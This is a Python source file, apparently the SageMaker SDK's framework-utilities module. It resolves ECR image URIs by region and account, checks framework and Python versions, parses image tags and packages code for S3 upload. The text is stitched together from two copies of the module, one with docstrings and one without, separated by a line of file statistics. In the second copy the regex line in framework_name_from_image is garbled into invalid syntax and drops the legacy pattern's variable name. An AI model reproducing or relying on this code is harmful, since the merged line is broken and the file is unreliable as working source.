PY2_RESTRICTED_EIA_FRAMEWORKS = ["pytorch-serving"]
PY37_SUPPORTED_FRAMEWORKS = ["tensorflow-scriptmode"]
VALID_ACCOUNTS_BY_REGION = {
"us-gov-west-1": "246785580436",
"us-iso-east-1": "744548109606",
"cn-north-1": "422961961927",
"cn-northwest-1": "423003514399",
}
ASIMOV_VALID_ACCOUNTS_BY_REGION = {
"us-gov-west-1": "442386744353",
"us-iso-east-1": "886529160074",
"cn-north-1": "727897471807",
"cn-northwest-1": "727897471807",
}
OPT_IN_ACCOUNTS_BY_REGION = {"ap-east-1": "057415533634", "me-south-1": "724002660598"}
ASIMOV_OPT_IN_ACCOUNTS_BY_REGION = {"ap-east-1": "871362719292", "me-south-1": "217643126080"}
DEFAULT_ACCOUNT = "520713654638"
ASIMOV_PROD_ACCOUNT = "763104351884"
ASIMOV_DEFAULT_ACCOUNT = ASIMOV_PROD_ACCOUNT
SINGLE_GPU_INSTANCE_TYPES = ("ml.p2.xlarge", "ml.p3.2xlarge")
MERGED_FRAMEWORKS_REPO_MAP = {
"tensorflow-scriptmode": "tensorflow-training",
"tensorflow-serving": "tensorflow-inference",
"tensorflow-serving-eia": "tensorflow-inference-eia",
"mxnet": "mxnet-training",
"mxnet-serving": "mxnet-inference",
"mxnet-serving-eia": "mxnet-inference-eia",
"pytorch": "pytorch-training",
"pytorch-serving": "pytorch-inference",
"pytorch-serving-eia": "pytorch-inference-eia",
}
MERGED_FRAMEWORKS_LOWEST_VERSIONS = {
"tensorflow-scriptmode": {"py3": [1, 13, 1], "py2": [1, 14, 0], "py37": [1, 15, 2]},
"tensorflow-serving": [1, 13, 0],
"tensorflow-serving-eia": [1, 14, 0],
"mxnet": {"py3": [1, 4, 1], "py2": [1, 6, 0]},
"mxnet-serving": {"py3": [1, 4, 1], "py2": [1, 6, 0]},
"mxnet-serving-eia": [1, 4, 1],
"pytorch": [1, 2, 0],
"pytorch-serving": [1, 2, 0],
"pytorch-serving-eia": [1, 3, 1],
}
INFERENTIA_VERSION_RANGES = {
"neo-mxnet": [[1, 5, 1], [1, 5, 1]],
"neo-tensorflow": [[1, 15, 0], [1, 15, 0]],
}
INFERENTIA_SUPPORTED_REGIONS = ["us-east-1", "us-west-2"]
DEBUGGER_UNSUPPORTED_REGIONS = ["us-gov-west-1", "us-iso-east-1"]
def is_version_equal_or_higher(lowest_version, framework_version):
"""Determine whether the ``framework_version`` is equal to or higher than
``lowest_version``
Args:
lowest_version (List[int]): lowest version represented in an integer
list
framework_version (str): framework version string
Returns:
bool: Whether or not ``framework_version`` is equal to or higher than
``lowest_version``
"""
version_list = [int(s) for s in framework_version.split(".")]
return version_list >= lowest_version[0 : len(version_list)]
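# Illustrative behaviour (comments added for clarity, not in the original module):
#   is_version_equal_or_higher([1, 13, 1], "1.14") -> True   ([1, 14] >= [1, 13])
#   is_version_equal_or_higher([1, 13, 1], "1.12") -> False  ([1, 12] <  [1, 13])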
def is_version_equal_or_lower(highest_version, framework_version):
"""Determine whether the ``framework_version`` is equal to or lower than
``highest_version``
Args:
highest_version (List[int]): highest version represented in an integer
list
framework_version (str): framework version string
Returns:
bool: Whether or not ``framework_version`` is equal to or lower than
``highest_version``
"""
version_list = [int(s) for s in framework_version.split(".")]
return version_list <= highest_version[0 : len(version_list)]
def _is_dlc_version(framework, framework_version, py_version):
"""Return if the framework's version uses the corresponding DLC image.
Args:
framework (str): The framework name, e.g. "tensorflow-scriptmode"
framework_version (str): The framework version
py_version (str): The Python version, e.g. "py3"
Returns:
bool: Whether or not the framework's version uses the DLC image.
"""
lowest_version_list = MERGED_FRAMEWORKS_LOWEST_VERSIONS.get(framework)
if isinstance(lowest_version_list, dict):
lowest_version_list = lowest_version_list[py_version]
if lowest_version_list:
return is_version_equal_or_higher(lowest_version_list, framework_version)
return False
def _is_inferentia_supported(framework, framework_version):
"""Return if Inferentia supports the framework and its version.
Args:
framework (str): The framework name, e.g. "tensorflow"
framework_version (str): The framework version
Returns:
bool: Whether or not Inferentia supports the framework and its version.
"""
lowest_version_list = INFERENTIA_VERSION_RANGES.get(framework)[0]
highest_version_list = INFERENTIA_VERSION_RANGES.get(framework)[1]
return is_version_equal_or_higher(
lowest_version_list, framework_version
) and is_version_equal_or_lower(highest_version_list, framework_version)
def _registry_id(region, framework, py_version, account, framework_version):
"""Return the Amazon ECR registry number (or AWS account ID) for
the given framework, framework version, Python version, and region.
Args:
region (str): The AWS region.
framework (str): The framework name, e.g. "tensorflow-scriptmode".
py_version (str): The Python version, e.g. "py3".
account (str): The AWS account ID to use as a default.
framework_version (str): The framework version.
Returns:
str: The appropriate Amazon ECR registry number. If there is no
specific one for the framework, framework version, Python version,
and region, then ``account`` is returned.
"""
if _is_dlc_version(framework, framework_version, py_version):
if region in ASIMOV_OPT_IN_ACCOUNTS_BY_REGION:
return ASIMOV_OPT_IN_ACCOUNTS_BY_REGION.get(region)
if region in ASIMOV_VALID_ACCOUNTS_BY_REGION:
return ASIMOV_VALID_ACCOUNTS_BY_REGION.get(region)
return ASIMOV_DEFAULT_ACCOUNT
if region in OPT_IN_ACCOUNTS_BY_REGION:
return OPT_IN_ACCOUNTS_BY_REGION.get(region)
return VALID_ACCOUNTS_BY_REGION.get(region, account)
def create_image_uri(
region,
framework,
instance_type,
framework_version,
py_version=None,
account=None,
accelerator_type=None,
optimized_families=None,
):
"""Return the ECR URI of an image.
Args:
region (str): AWS region where the image is uploaded.
framework (str): framework used by the image.
instance_type (str): SageMaker instance type. Used to determine device
type (cpu/gpu/family-specific optimized).
framework_version (str): The version of the framework.
py_version (str): Optional. Python version. If specified, should be one
of 'py2' or 'py3'. If not specified, image uri will not include a
python component.
account (str): AWS account that contains the image. (default:
'520713654638')
accelerator_type (str): SageMaker Elastic Inference accelerator type.
optimized_families (str): Instance families for which there exist
specific optimized images.
Returns:
str: The appropriate image URI based on the given parameters.
"""
logger.warning(
"'create_image_uri' will be deprecated in favor of 'ImageURIProvider' class "
"in SageMaker Python SDK v2."
)
optimized_families = optimized_families or []
if py_version and py_version not in VALID_PY_VERSIONS:
raise ValueError("invalid py_version argument: {}".format(py_version))
if py_version == "py37" and framework not in PY37_SUPPORTED_FRAMEWORKS:
raise ValueError("{} does not support Python 3.7 at this time.".format(framework))
if _accelerator_type_valid_for_framework(
framework=framework,
py_version=py_version,
accelerator_type=accelerator_type,
optimized_families=optimized_families,
):
framework += "-eia"
# Handle account number for specific cases (e.g. GovCloud, opt-in regions, DLC images etc.)
if account is None:
account = _registry_id(
region=region,
framework=framework,
py_version=py_version,
account=DEFAULT_ACCOUNT,
framework_version=framework_version,
)
# Handle Local Mode
if instance_type.startswith("local"):
device_type = "cpu" if instance_type == "local" else "gpu"
elif not instance_type.startswith("ml."):
raise ValueError(
"{} is not a valid SageMaker instance type. See: "
"https://aws.amazon.com/sagemaker/pricing/instance-types/".format(instance_type)
)
else:
family = instance_type.split(".")[1]
# For some frameworks, we have optimized images for specific families, e.g c5 or p3.
# In those cases, we use the family name in the image tag. In other cases, we use
# 'cpu' or 'gpu'.
if family in optimized_families:
device_type = family
elif family.startswith("inf"):
device_type = "inf"
elif family[0] in ["g", "p"]:
device_type = "gpu"
else:
device_type = "cpu"
if device_type == "inf":
if region not in INFERENTIA_SUPPORTED_REGIONS:
raise ValueError(
"Inferentia is not supported in region {}. Supported regions are {}".format(
region, ", ".join(INFERENTIA_SUPPORTED_REGIONS)
)
)
if framework not in INFERENTIA_VERSION_RANGES:
raise ValueError(
"Inferentia does not support {}. Currently it supports "
"MXNet and TensorFlow with more frameworks coming soon.".format(
framework.split("-")[-1]
)
)
if not _is_inferentia_supported(framework, framework_version):
raise ValueError(
"Inferentia is not supported with {} version {}.".format(
framework.split("-")[-1], framework_version
)
)
use_dlc_image = _is_dlc_version(framework, framework_version, py_version)
if not py_version or (use_dlc_image and framework == "tensorflow-serving-eia"):
tag = "{}-{}".format(framework_version, device_type)
else:
tag = "{}-{}-{}".format(framework_version, device_type, py_version)
if use_dlc_image:
ecr_repo = MERGED_FRAMEWORKS_REPO_MAP[framework]
else:
ecr_repo = "sagemaker-{}".format(framework)
return "{}/{}:{}".format(get_ecr_image_uri_prefix(account, region), ecr_repo, tag)
def _accelerator_type_valid_for_framework(
framework, py_version, accelerator_type=None, optimized_families=None
):
"""
Args:
framework:
py_version:
accelerator_type:
optimized_families:
"""
if accelerator_type is None:
return False
if py_version == "py2" and framework in PY2_RESTRICTED_EIA_FRAMEWORKS:
raise ValueError(
"{} is not supported with Amazon Elastic Inference in Python 2.".format(framework)
)
if framework not in VALID_EIA_FRAMEWORKS:
raise ValueError(
"{} is not supported with Amazon Elastic Inference. Currently only "
"Python-based TensorFlow, MXNet, PyTorch are supported.".format(framework)
)
if optimized_families:
raise ValueError("Neo does not support Amazon Elastic Inference.")
if (
not accelerator_type.startswith("ml.eia")
and not accelerator_type == "local_sagemaker_notebook"
):
raise ValueError(
"{} is not a valid SageMaker Elastic Inference accelerator type. "
"See: https://docs.aws.amazon.com/sagemaker/latest/dg/ei.html".format(accelerator_type)
)
return True
def validate_source_dir(script, directory):
"""Validate that the source directory exists and it contains the user script
Args:
script (str): Script filename.
directory (str): Directory containing the source file.
Raises:
ValueError: If ``directory`` does not exist, is not a directory, or does
not contain ``script``.
"""
if directory:
if not os.path.isfile(os.path.join(directory, script)):
raise ValueError(
'No file named "{}" was found in directory "{}".'.format(script, directory)
)
return True
def tar_and_upload_dir(
session,
bucket,
s3_key_prefix,
script,
directory=None,
dependencies=None,
kms_key=None,
s3_resource=None,
):
"""Package source files and upload a compress tar file to S3. The S3
location will be ``s3://<bucket>/s3_key_prefix/sourcedir.tar.gz``.
If directory is an S3 URI, an UploadedCode object will be returned, but
nothing will be uploaded to S3 (this allows reuse of code already in S3).
If directory is None, the script will be added to the archive at
``./<basename of script>``.
If directory is not None, the (recursive) contents of the directory will
be added to the archive. directory is treated as the base path of the
archive, and the script name is assumed to be a filename or relative path
inside the directory.
Args:
session (boto3.Session): Boto session used to access S3.
bucket (str): S3 bucket to which the compressed file is uploaded.
s3_key_prefix (str): Prefix for the S3 key.
script (str): Script filename or path.
directory (str): Optional. Directory containing the source file. If it
starts with "s3://", no action is taken.
dependencies (List[str]): Optional. A list of paths to directories
(absolute or relative) containing additional libraries that will be
copied into /opt/ml/lib
kms_key (str): Optional. KMS key ID used to upload objects to the bucket
(default: None).
s3_resource (boto3.resource("s3")): Optional. Pre-instantiated Boto3 Resource
for S3 connections, can be used to customize the configuration,
e.g. set the endpoint URL (default: None).
Returns:
sagemaker.fw_utils.UserCode: An object with the S3 bucket and key (S3 prefix) and
script name.
"""
if directory and directory.lower().startswith("s3://"):
return UploadedCode(s3_prefix=directory, script_name=os.path.basename(script))
script_name = script if directory else os.path.basename(script)
dependencies = dependencies or []
key = "%s/sourcedir.tar.gz" % s3_key_prefix
tmp = tempfile.mkdtemp()
try:
source_files = _list_files_to_compress(script, directory) + dependencies
tar_file = sagemaker.utils.create_tar_file(
source_files, os.path.join(tmp, _TAR_SOURCE_FILENAME)
)
if kms_key:
extra_args = {"ServerSideEncryption": "aws:kms", "SSEKMSKeyId": kms_key}
else:
extra_args = None
if s3_resource is None:
s3_resource = session.resource("s3", region_name=session.region_name)
else:
print("Using provided s3_resource")
s3_resource.Object(bucket, key).upload_file(tar_file, ExtraArgs=extra_args)
finally:
shutil.rmtree(tmp)
return UploadedCode(s3_prefix="s3://%s/%s" % (bucket, key), script_name=script_name)
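# Illustrative usage (added for clarity; the bucket, prefix and file names are hypothetical):
#   tar_and_upload_dir(boto_session, "my-bucket", "jobs/abc", "train.py", directory="src")
#   packs src/ into a tarball, uploads it to s3://my-bucket/jobs/abc/sourcedir.tar.gz and
#   returns UploadedCode(s3_prefix="s3://my-bucket/jobs/abc/sourcedir.tar.gz",
#                        script_name="train.py")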
def _list_files_to_compress(script, directory):
"""
Args:
script:
directory:
"""
if directory is None:
return [script]
basedir = directory if directory else os.path.dirname(script)
return [os.path.join(basedir, name) for name in os.listdir(basedir)]
def framework_name_from_image(image_name):
# noinspection LongLine
"""Extract the framework and Python version from the image name.
Args:
image_name (str): Image URI, which should be one of the following forms:
legacy:
'<account>.dkr.ecr.<region>.amazonaws.com/sagemaker-<fw>-<py_ver>-<device>:<container_version>'
legacy:
'<account>.dkr.ecr.<region>.amazonaws.com/sagemaker-<fw>-<py_ver>-<device>:<fw_version>-<device>-<py_ver>'
current:
'<account>.dkr.ecr.<region>.amazonaws.com/sagemaker-<fw>:<fw_version>-<device>-<py_ver>'
current:
'<account>.dkr.ecr.<region>.amazonaws.com/sagemaker-rl-<fw>:<rl_toolkit><rl_version>-<device>-<py_ver>'
Returns:
tuple: A tuple containing:
str: The framework name
str: The Python version
str: The image tag
str: If the image is script mode
"""
sagemaker_pattern = re.compile(ECR_URI_PATTERN)
sagemaker_match = sagemaker_pattern.match(image_name)
if sagemaker_match is None:
return None, None, None, None
# extract framework, python version and image tag
# We must support both the legacy and current image name format.
name_pattern = re.compile(
r"^(?:sagemaker(?:-rl)?-)?(tensorflow|mxnet|chainer|pytorch|scikit-learn|xgboost)(?:-)?(scriptmode|training)?:(.*)-(.*?)-(py2|py3)$" # noqa: E501 # pylint: disable=line-too-long
)
legacy_name_pattern = re.compile(r"^sagemaker-(tensorflow|mxnet)-(py2|py3)-(cpu|gpu):(.*)$")
name_match = name_pattern.match(sagemaker_match.group(9))
legacy_match = legacy_name_pattern.match(sagemaker_match.group(9))
if name_match is not None:
fw, scriptmode, ver, device, py = (
name_match.group(1),
name_match.group(2),
name_match.group(3),
name_match.group(4),
name_match.group(5),
)
return fw, py, "{}-{}-{}".format(ver, device, py), scriptmode
if legacy_match is not None:
return (legacy_match.group(1), legacy_match.group(2), legacy_match.group(4), None)
return None, None, None, None
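# Illustrative parse (added for clarity; the URI below is a made-up but standard-form
# ECR image name):
#   framework_name_from_image(
#       "123456789012.dkr.ecr.us-west-2.amazonaws.com/sagemaker-tensorflow-scriptmode:1.13.1-cpu-py3"
#   )
#   -> ("tensorflow", "py3", "1.13.1-cpu-py3", "scriptmode")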
def framework_version_from_tag(image_tag):
"""Extract the framework version from the image tag.
Args:
image_tag (str): Image tag, which should take the form
'<framework_version>-<device>-<py_version>'
Returns:
str: The framework version.
"""
tag_pattern = re.compile("^(.*)-(cpu|gpu)-(py2|py3)$")
tag_match = tag_pattern.match(image_tag)
return None if tag_match is None else tag_match.group(1)
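# Illustrative behaviour (added for clarity):
#   framework_version_from_tag("1.13.1-gpu-py3") -> "1.13.1"
#   framework_version_from_tag("latest")         -> None (tag does not match the pattern)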
def parse_s3_url(url):
"""Calls the method with the same name in the s3 module.
:func:~sagemaker.s3.parse_s3_url
Args:
url: A URL, expected with an s3 scheme.
Returns: The return value of s3.parse_s3_url, which is a tuple containing:
str: S3 bucket name
str: S3 key
"""
return s3.parse_s3_url(url)
def model_code_key_prefix(code_location_key_prefix, model_name, image):
"""Returns the s3 key prefix for uploading code during model deployment
The location returned is a potential concatenation of 2 parts
1. code_location_key_prefix if it exists
2. model_name or a name derived from the image
Args:
code_location_key_prefix (str): the s3 key prefix from code_location
model_name (str): the name of the model
image (str): the image from which a default name can be extracted
Returns:
str: the key prefix to be used in uploading code
"""
training_job_name = sagemaker.utils.name_from_image(image)
return "/".join(filter(None, [code_location_key_prefix, model_name or training_job_name]))
def empty_framework_version_warning(default_version, latest_version):
"""
Args:
default_version:
latest_version:
"""
msgs = [EMPTY_FRAMEWORK_VERSION_WARNING.format(default_version)]
if default_version != latest_version:
msgs.append(later_framework_version_warning(latest_version))
return " ".join(msgs)
def later_framework_version_warning(latest_version):
"""
Args:
latest_version:
"""
return LATER_FRAMEWORK_VERSION_WARNING.format(latest=latest_version)
def warn_if_parameter_server_with_multi_gpu(training_instance_type, distributions):
"""Warn the user that training will not fully leverage all the GPU
cores if parameter server is enabled and a multi-GPU instance is selected.
Distributed training with the default parameter server setup doesn't
support multi-GPU instances.
Args:
training_instance_type (str): A string representing the type of training instance selected.
distributions (dict): A dictionary with information to enable distributed training.
(Defaults to None if distributed training is not enabled.) For example:
.. code:: python
{
'parameter_server':
{
'enabled': True
}
}
"""
if training_instance_type == "local" or distributions is None:
return
is_multi_gpu_instance = (
training_instance_type == "local_gpu"
or training_instance_type.split(".")[1].startswith("p")
) and training_instance_type not in SINGLE_GPU_INSTANCE_TYPES
ps_enabled = "parameter_server" in distributions and distributions["parameter_server"].get(
"enabled", False
)
if is_multi_gpu_instance and ps_enabled:
logger.warning(PARAMETER_SERVER_MULTI_GPU_WARNING)
def get_unsupported_framework_version_error(
framework_name, unsupported_version, supported_versions
):
"""Return error message for unsupported framework version.
This should also return the supported versions for customers.
:param framework_name:
:param unsupported_version:
:param supported_versions:
:return:
"""
return UNSUPPORTED_FRAMEWORK_VERSION_ERROR.format(
framework_name,
unsupported_version,
", ".join('"{}"'.format(version) for version in supported_versions),
)
def python_deprecation_warning(framework, latest_supported_version):
"""
Args:
framework:
latest_supported_version:
"""
return PYTHON_2_DEPRECATION_WARNING.format(
framework=framework, latest_supported_version=latest_supported_version
)
def parameter_v2_rename_warning(v1_parameter_name, v2_parameter_name):
"""
Args:
v1_parameter_name: parameter name used in SageMaker Python SDK v1
v2_parameter_name: parameter name used in SageMaker Python SDK v2
"""
return PARAMETER_V2_RENAME_WARNING.format(
v1_parameter_name=v1_parameter_name, v2_parameter_name=v2_parameter_name
)
def _region_supports_debugger(region_name):
"""Returns boolean indicating whether the region supports Amazon SageMaker Debugger.
Args:
region_name (str): Name of the region to check against.
Returns:
bool: Whether or not the region supports Amazon SageMaker Debugger.
"""
return region_name.lower() not in DEBUGGER_UNSUPPORTED_REGIONS
| 36.986994
| 186
| 0.675601
|
from __future__ import absolute_import
import logging
import os
import re
import shutil
import tempfile
from collections import namedtuple
import sagemaker.utils
from sagemaker import s3
from sagemaker.utils import get_ecr_image_uri_prefix, ECR_URI_PATTERN
logger = logging.getLogger("sagemaker")
_TAR_SOURCE_FILENAME = "source.tar.gz"
UploadedCode = namedtuple("UserCode", ["s3_prefix", "script_name"])
EMPTY_FRAMEWORK_VERSION_WARNING = (
"No framework_version specified, defaulting to version {}. "
"framework_version will be required in SageMaker Python SDK v2."
)
LATER_FRAMEWORK_VERSION_WARNING = (
"This is not the latest supported version. "
"If you would like to use version {latest}, "
"please add framework_version={latest} to your constructor."
)
PYTHON_2_DEPRECATION_WARNING = (
"{latest_supported_version} is the latest version of {framework} that supports "
"Python 2. Newer versions of {framework} will only be available for Python 3."
"Please set the argument \"py_version='py3'\" to use the Python 3 {framework} image."
)
PARAMETER_SERVER_MULTI_GPU_WARNING = (
"If you have selected a multi-GPU training instance type, "
"and have also enabled parameter server for distributed training. "
"Distributed training with the default parameter server configuration will not "
"fully leverage all GPU cores; the parameter server will be configured to run "
"only one worker per host regardless of the number of GPUs."
)
PARAMETER_V2_RENAME_WARNING = (
"Parameter {v1_parameter_name} will be renamed to {v2_parameter_name} "
"in SageMaker Python SDK v2."
)
EMPTY_FRAMEWORK_VERSION_ERROR = (
"framework_version is required for script mode estimator. "
"Please add framework_version={} to your constructor to avoid this error."
)
UNSUPPORTED_FRAMEWORK_VERSION_ERROR = (
"{} framework does not support version {}. Please use one of the following: {}."
)
VALID_PY_VERSIONS = ["py2", "py3", "py37"]
VALID_EIA_FRAMEWORKS = [
"tensorflow",
"tensorflow-serving",
"mxnet",
"mxnet-serving",
"pytorch-serving",
]
PY2_RESTRICTED_EIA_FRAMEWORKS = ["pytorch-serving"]
PY37_SUPPORTED_FRAMEWORKS = ["tensorflow-scriptmode"]
VALID_ACCOUNTS_BY_REGION = {
"us-gov-west-1": "246785580436",
"us-iso-east-1": "744548109606",
"cn-north-1": "422961961927",
"cn-northwest-1": "423003514399",
}
ASIMOV_VALID_ACCOUNTS_BY_REGION = {
"us-gov-west-1": "442386744353",
"us-iso-east-1": "886529160074",
"cn-north-1": "727897471807",
"cn-northwest-1": "727897471807",
}
OPT_IN_ACCOUNTS_BY_REGION = {"ap-east-1": "057415533634", "me-south-1": "724002660598"}
ASIMOV_OPT_IN_ACCOUNTS_BY_REGION = {"ap-east-1": "871362719292", "me-south-1": "217643126080"}
DEFAULT_ACCOUNT = "520713654638"
ASIMOV_PROD_ACCOUNT = "763104351884"
ASIMOV_DEFAULT_ACCOUNT = ASIMOV_PROD_ACCOUNT
SINGLE_GPU_INSTANCE_TYPES = ("ml.p2.xlarge", "ml.p3.2xlarge")
MERGED_FRAMEWORKS_REPO_MAP = {
"tensorflow-scriptmode": "tensorflow-training",
"tensorflow-serving": "tensorflow-inference",
"tensorflow-serving-eia": "tensorflow-inference-eia",
"mxnet": "mxnet-training",
"mxnet-serving": "mxnet-inference",
"mxnet-serving-eia": "mxnet-inference-eia",
"pytorch": "pytorch-training",
"pytorch-serving": "pytorch-inference",
"pytorch-serving-eia": "pytorch-inference-eia",
}
MERGED_FRAMEWORKS_LOWEST_VERSIONS = {
"tensorflow-scriptmode": {"py3": [1, 13, 1], "py2": [1, 14, 0], "py37": [1, 15, 2]},
"tensorflow-serving": [1, 13, 0],
"tensorflow-serving-eia": [1, 14, 0],
"mxnet": {"py3": [1, 4, 1], "py2": [1, 6, 0]},
"mxnet-serving": {"py3": [1, 4, 1], "py2": [1, 6, 0]},
"mxnet-serving-eia": [1, 4, 1],
"pytorch": [1, 2, 0],
"pytorch-serving": [1, 2, 0],
"pytorch-serving-eia": [1, 3, 1],
}
INFERENTIA_VERSION_RANGES = {
"neo-mxnet": [[1, 5, 1], [1, 5, 1]],
"neo-tensorflow": [[1, 15, 0], [1, 15, 0]],
}
INFERENTIA_SUPPORTED_REGIONS = ["us-east-1", "us-west-2"]
DEBUGGER_UNSUPPORTED_REGIONS = ["us-gov-west-1", "us-iso-east-1"]
def is_version_equal_or_higher(lowest_version, framework_version):
version_list = [int(s) for s in framework_version.split(".")]
return version_list >= lowest_version[0 : len(version_list)]
def is_version_equal_or_lower(highest_version, framework_version):
version_list = [int(s) for s in framework_version.split(".")]
return version_list <= highest_version[0 : len(version_list)]
def _is_dlc_version(framework, framework_version, py_version):
lowest_version_list = MERGED_FRAMEWORKS_LOWEST_VERSIONS.get(framework)
if isinstance(lowest_version_list, dict):
lowest_version_list = lowest_version_list[py_version]
if lowest_version_list:
return is_version_equal_or_higher(lowest_version_list, framework_version)
return False
def _is_inferentia_supported(framework, framework_version):
lowest_version_list = INFERENTIA_VERSION_RANGES.get(framework)[0]
highest_version_list = INFERENTIA_VERSION_RANGES.get(framework)[1]
return is_version_equal_or_higher(
lowest_version_list, framework_version
) and is_version_equal_or_lower(highest_version_list, framework_version)
def _registry_id(region, framework, py_version, account, framework_version):
if _is_dlc_version(framework, framework_version, py_version):
if region in ASIMOV_OPT_IN_ACCOUNTS_BY_REGION:
return ASIMOV_OPT_IN_ACCOUNTS_BY_REGION.get(region)
if region in ASIMOV_VALID_ACCOUNTS_BY_REGION:
return ASIMOV_VALID_ACCOUNTS_BY_REGION.get(region)
return ASIMOV_DEFAULT_ACCOUNT
if region in OPT_IN_ACCOUNTS_BY_REGION:
return OPT_IN_ACCOUNTS_BY_REGION.get(region)
return VALID_ACCOUNTS_BY_REGION.get(region, account)
def create_image_uri(
region,
framework,
instance_type,
framework_version,
py_version=None,
account=None,
accelerator_type=None,
optimized_families=None,
):
logger.warning(
"'create_image_uri' will be deprecated in favor of 'ImageURIProvider' class "
"in SageMaker Python SDK v2."
)
optimized_families = optimized_families or []
if py_version and py_version not in VALID_PY_VERSIONS:
raise ValueError("invalid py_version argument: {}".format(py_version))
if py_version == "py37" and framework not in PY37_SUPPORTED_FRAMEWORKS:
raise ValueError("{} does not support Python 3.7 at this time.".format(framework))
if _accelerator_type_valid_for_framework(
framework=framework,
py_version=py_version,
accelerator_type=accelerator_type,
optimized_families=optimized_families,
):
framework += "-eia"
if account is None:
account = _registry_id(
region=region,
framework=framework,
py_version=py_version,
account=DEFAULT_ACCOUNT,
framework_version=framework_version,
)
if instance_type.startswith("local"):
device_type = "cpu" if instance_type == "local" else "gpu"
elif not instance_type.startswith("ml."):
raise ValueError(
"{} is not a valid SageMaker instance type. See: "
"https://aws.amazon.com/sagemaker/pricing/instance-types/".format(instance_type)
)
else:
family = instance_type.split(".")[1]
if family in optimized_families:
device_type = family
elif family.startswith("inf"):
device_type = "inf"
elif family[0] in ["g", "p"]:
device_type = "gpu"
else:
device_type = "cpu"
if device_type == "inf":
if region not in INFERENTIA_SUPPORTED_REGIONS:
raise ValueError(
"Inferentia is not supported in region {}. Supported regions are {}".format(
region, ", ".join(INFERENTIA_SUPPORTED_REGIONS)
)
)
if framework not in INFERENTIA_VERSION_RANGES:
raise ValueError(
"Inferentia does not support {}. Currently it supports "
"MXNet and TensorFlow with more frameworks coming soon.".format(
framework.split("-")[-1]
)
)
if not _is_inferentia_supported(framework, framework_version):
raise ValueError(
"Inferentia is not supported with {} version {}.".format(
framework.split("-")[-1], framework_version
)
)
use_dlc_image = _is_dlc_version(framework, framework_version, py_version)
if not py_version or (use_dlc_image and framework == "tensorflow-serving-eia"):
tag = "{}-{}".format(framework_version, device_type)
else:
tag = "{}-{}-{}".format(framework_version, device_type, py_version)
if use_dlc_image:
ecr_repo = MERGED_FRAMEWORKS_REPO_MAP[framework]
else:
ecr_repo = "sagemaker-{}".format(framework)
return "{}/{}:{}".format(get_ecr_image_uri_prefix(account, region), ecr_repo, tag)
def _accelerator_type_valid_for_framework(
framework, py_version, accelerator_type=None, optimized_families=None
):
if accelerator_type is None:
return False
if py_version == "py2" and framework in PY2_RESTRICTED_EIA_FRAMEWORKS:
raise ValueError(
"{} is not supported with Amazon Elastic Inference in Python 2.".format(framework)
)
if framework not in VALID_EIA_FRAMEWORKS:
raise ValueError(
"{} is not supported with Amazon Elastic Inference. Currently only "
"Python-based TensorFlow, MXNet, PyTorch are supported.".format(framework)
)
if optimized_families:
raise ValueError("Neo does not support Amazon Elastic Inference.")
if (
not accelerator_type.startswith("ml.eia")
and not accelerator_type == "local_sagemaker_notebook"
):
raise ValueError(
"{} is not a valid SageMaker Elastic Inference accelerator type. "
"See: https://docs.aws.amazon.com/sagemaker/latest/dg/ei.html".format(accelerator_type)
)
return True
def validate_source_dir(script, directory):
if directory:
if not os.path.isfile(os.path.join(directory, script)):
raise ValueError(
'No file named "{}" was found in directory "{}".'.format(script, directory)
)
return True
def tar_and_upload_dir(
session,
bucket,
s3_key_prefix,
script,
directory=None,
dependencies=None,
kms_key=None,
s3_resource=None,
):
if directory and directory.lower().startswith("s3://"):
return UploadedCode(s3_prefix=directory, script_name=os.path.basename(script))
script_name = script if directory else os.path.basename(script)
dependencies = dependencies or []
key = "%s/sourcedir.tar.gz" % s3_key_prefix
tmp = tempfile.mkdtemp()
try:
source_files = _list_files_to_compress(script, directory) + dependencies
tar_file = sagemaker.utils.create_tar_file(
source_files, os.path.join(tmp, _TAR_SOURCE_FILENAME)
)
if kms_key:
extra_args = {"ServerSideEncryption": "aws:kms", "SSEKMSKeyId": kms_key}
else:
extra_args = None
if s3_resource is None:
s3_resource = session.resource("s3", region_name=session.region_name)
else:
print("Using provided s3_resource")
s3_resource.Object(bucket, key).upload_file(tar_file, ExtraArgs=extra_args)
finally:
shutil.rmtree(tmp)
return UploadedCode(s3_prefix="s3://%s/%s" % (bucket, key), script_name=script_name)
def _list_files_to_compress(script, directory):
if directory is None:
return [script]
basedir = directory if directory else os.path.dirname(script)
return [os.path.join(basedir, name) for name in os.listdir(basedir)]
def framework_name_from_image(image_name):
sagemaker_pattern = re.compile(ECR_URI_PATTERN)
sagemaker_match = sagemaker_pattern.match(image_name)
if sagemaker_match is None:
return None, None, None, None
name_pattern = re.compile(
r"^(?:sagemaker(?:-rl)?-)?(tensorflow|mxnet|chainer|pytorch|scikit-learn|xgboost)(?:-)?(scriptmode|training)?:(.*)-(.*?)-(py2|py3)$" = re.compile(r"^sagemaker-(tensorflow|mxnet)-(py2|py3)-(cpu|gpu):(.*)$")
name_match = name_pattern.match(sagemaker_match.group(9))
legacy_match = legacy_name_pattern.match(sagemaker_match.group(9))
if name_match is not None:
fw, scriptmode, ver, device, py = (
name_match.group(1),
name_match.group(2),
name_match.group(3),
name_match.group(4),
name_match.group(5),
)
return fw, py, "{}-{}-{}".format(ver, device, py), scriptmode
if legacy_match is not None:
return (legacy_match.group(1), legacy_match.group(2), legacy_match.group(4), None)
return None, None, None, None
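# Illustrative sketch, not part of the original module: shows the tuples the parser above
# is expected to return for the two tag layouts it recognises. The account/region prefixes
# are made-up examples, and this assumes ECR_URI_PATTERN captures the "repository:tag"
# portion of a standard ECR URI.
def _example_framework_name_parsing():
    new_style = framework_name_from_image(
        "123456789012.dkr.ecr.us-west-2.amazonaws.com/sagemaker-tensorflow-scriptmode:1.15.2-gpu-py3"
    )
    # expected roughly: ("tensorflow", "py3", "1.15.2-gpu-py3", "scriptmode")
    legacy_style = framework_name_from_image(
        "123456789012.dkr.ecr.us-west-2.amazonaws.com/sagemaker-mxnet-py2-cpu:1.0"
    )
    # expected roughly: ("mxnet", "py2", "1.0", None)
    return new_style, legacy_style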
def framework_version_from_tag(image_tag):
tag_pattern = re.compile("^(.*)-(cpu|gpu)-(py2|py3)$")
tag_match = tag_pattern.match(image_tag)
return None if tag_match is None else tag_match.group(1)
def parse_s3_url(url):
return s3.parse_s3_url(url)
def model_code_key_prefix(code_location_key_prefix, model_name, image):
training_job_name = sagemaker.utils.name_from_image(image)
return "/".join(filter(None, [code_location_key_prefix, model_name or training_job_name]))
def empty_framework_version_warning(default_version, latest_version):
msgs = [EMPTY_FRAMEWORK_VERSION_WARNING.format(default_version)]
if default_version != latest_version:
msgs.append(later_framework_version_warning(latest_version))
return " ".join(msgs)
